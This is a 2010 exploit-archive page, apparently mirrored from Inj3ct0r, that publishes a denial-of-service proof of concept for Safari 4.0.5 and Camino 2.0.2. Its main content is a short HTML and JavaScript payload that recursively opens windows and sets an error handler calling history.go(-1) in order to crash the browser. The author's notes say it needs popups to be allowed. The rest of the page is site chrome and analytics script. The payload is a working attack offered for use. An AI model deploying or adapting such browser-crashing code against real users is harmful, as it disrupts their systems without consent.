Home / os / win7

Safari 4.0.5 & Camino 2.0.2 history.go() DoS

Posted on 04 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Safari 4.0.5 &amp; Camino 2.0.2 history.go() DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ Safari 4.0.5 &amp; Camino 2.0.2 history.go() DoS ============================================ &lt;-- Camino 2.0.2 history.go() DoS Found By: Dr_IDE Tested On: Camino 2.0.2 on OSX 10.6.3 Notes: Impact is reduced because user must either have popup blocker off, or accept popups. Tested On: Safari 4.0.5 on OSX 10.6.3 Notes: Impact is reduced because user must either have popup blocker off, or accept popups. --&gt; &lt;html&gt; &lt;title&gt;Dr_IDE - Camino 2.0.2 &amp; Safari 4.0.5 DoS PoC&lt;/title&gt; &lt;script&gt; function test(){ window.onerror=new Function(&quot;history.go(-1)&quot;); window.open('http://www.exploit-db.com'); test(); } test(); &lt;/script&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-04]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP